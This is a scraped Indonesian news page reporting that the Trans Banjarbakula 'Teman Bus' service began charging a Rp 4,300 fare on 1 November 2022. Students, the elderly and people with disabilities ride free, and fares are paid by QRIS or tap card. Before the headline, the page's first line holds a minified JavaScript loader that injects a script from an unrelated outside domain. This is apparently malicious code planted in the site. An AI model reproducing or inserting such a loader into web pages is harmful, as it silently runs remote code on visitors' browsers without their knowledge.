(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Tarif BTS Trans Banjarbakula Rp 4.300, Khusus Pelajar, Lansia, dan Disabilitas Gratis!


KANALKALIMANTAN.COM, BANJARBARU – Layanan bus Buy The Service (BTS) Trans Banjarbakula “Teman Bus” milik Kementerian Perhubungan (Kemenhub) RI secara resmi berbayar terhitung mulai Selasa (1/11/2022).

Kemenhub RI secara resmi mengenakan tarif  sebesar Rp 4.300. Walau sudah berbayar, tidak semua penumpang akan dikenakan tarif. Hal ini disampaikan Manager BTS Trans Banjarbakula, Zochrofi Miladdini. Dia mengatakan, khusus untuk pelajar, lansia 60 tahun ke atas dan penyandang disabilitas, tidak dikenakan biaya naik BTS Trans Banjarbakula.

Bagi pelajar harus menampilkan kartu pelajar sedangkan untuk lansia menampilkan KTP kepada sopir.

“Saat ini pembayaran yang digunakan baru dengan Qris, bisa m-banking semua bank dan pakai dompet digital lainnya,” kata Ovi -saapan akrabnya- saat ditemui di kantor di Terminal Gambut Barakat KM 17.

 

 

Manager BTS Trans Banjarbakula, Zochrofi Miladdini. Foto: ibnu

Baca juga  : KONI Balangan Bagikan Seragam Kontingen Porprov dengan Motif Anyaman Arangan

Dilanjutkan Ovi, kartu tapping akan mulai dipakai di pertengahan November 2022.

“Alternatif pembayaran dua-duanya bisa dipakai (Qris dan kartu tapping), mana yang cepat,” ujarnya.

Menurutnya kesulitan waktu berbayar itu pasti ada, namun Ovi yakin seiring berjalannya waktu masyarakat akan terbiasa.

“Bagi penumpang yang belum memiliki akun Qris dalam pembayarannya akan dibantu oleh sopir di lapangan,” bebernya.

Masih kata Ovi, pembayaran berlaku setiap kali penumpang berganti bis, ke depan dirinya berharap ada kebijakan agar pembayaran cukup satu kali.

“Saat ini regulasi pembayaran yang kami jalankan adalah setiap pergantian bis, semoga ada kabar baik, nanti dari Banjarbaru ke Banjarmasin cukup satu kali bayar. Kami berharap  ada segera kebijakan seperti itu, tapi saat ini baru setiap kali ganti bis,” harapnya.

Penumpang BTS Trans Banjarbakula mulai dikenakan tarif Rp 4.300 per 1 Novmber 2022. Foto : ibnu

Baca juga : Mulai 1 November BTS Banjarbakula Tak Lagi Gratis, Ini Tarif dan Cara Bayarnya

Sementara itu, salah seorang penumpang BTS Trans Banjarbakula, Hernidawati mengaku menyambut baik dengan berbayarnya layanan Teman Bus, guna menghindari adanya penumpang gelap di dalam bus.

“Banyak kota besar di Indonesia sudah menerapkan cashless, kalau tidak dibiasakan di Banjarmasin akan terjadi kemunduran,” ujar wanita kerap disapa Nida ini.

Walaupun berbayar ia mengatakan ini lumayan terjangkau, apalagi saat harga BBM mahal.

Ia menuturkan masih banyak penumpang kebingungan saat ingin naik layanan Teman Bus ini. Namun, dengan adanya bantuan dari sopir bus penumpang bisa dengan mudah membayarnya.

“Masih ada tadi (penumpang) yang tidak pakai smartphone lumayan terkendala karena belum memakai kartu tapcash, banyak dibantu petugas Teman Bus di terminal sehingga penumpang banyak terbantu,” tuntasnya. (Kanalkalimantan.com/ibnu)

Reporter : ibnu
Editor : cell


Desy Arfianty

Recent Posts

Pemkab Gelar Pisah Sambut Kapolres Banjar, AKBP Dr Fadli Gantikan AKBP Ifan Hariyat

KANALKALIMANTAN.COM, MARTAPURA - Pisah sambut Kapolres Banjar dari AKBP M Ifan Hariyat kepada AKBP Dr… Read More

44 menit ago

Pemerintah Berikan Pemutihan Denda Pajak pada 2025, Ini Ketentuannya!

KANALKALIMANTAN.COM - Pemerintah kembali menghadirkan kebijakan pemutihan denda pajak sebagai langkah strategis untuk meningkatkan kepatuhan… Read More

2 jam ago

Warga Tak Tahu Ada PSU, ‘PR’ KPU Kalsel Ajak Pemilih Datangi TPS

KANALKALIMANTAN.COM, BANJARBARU - Komisi Pemilihan Umum (KPU) Provinsi Kalimantan Selatan (Kalsel) punya 'pekerjaan rumah' berat… Read More

15 jam ago

Minta Dakwaan Tunggal Pasal Pembunuham Berencana ke Jumran

KANALKALIMANTAN.COM, BANJARBARU - Tim kuasa hukum Juwita wartawati media online meminta Oditurat Militer (Odmil) III-15… Read More

17 jam ago

Buka Bimbingan Manasik Haji, Ini Pesan Bupati HSU ke Calon Jemaah Haji

KANALKALIMANTAN.COM, AMUNTAI - Bupati Hulu Sungai Utara (HSU) H Sahrujani membuka bimbingan manasik haji bagi… Read More

19 jam ago

Dipastikan Dipecat, Sidang Jumran di Pengadilan Militer Secara Terbuka

KANALKALIMANTAN.COM, BANJARBARU - Tersangka Kelasi I Bahari Jumran dipastikan dipecat  sebagai anggota TNI Angkatan Laut… Read More

20 jam ago

This website uses cookies.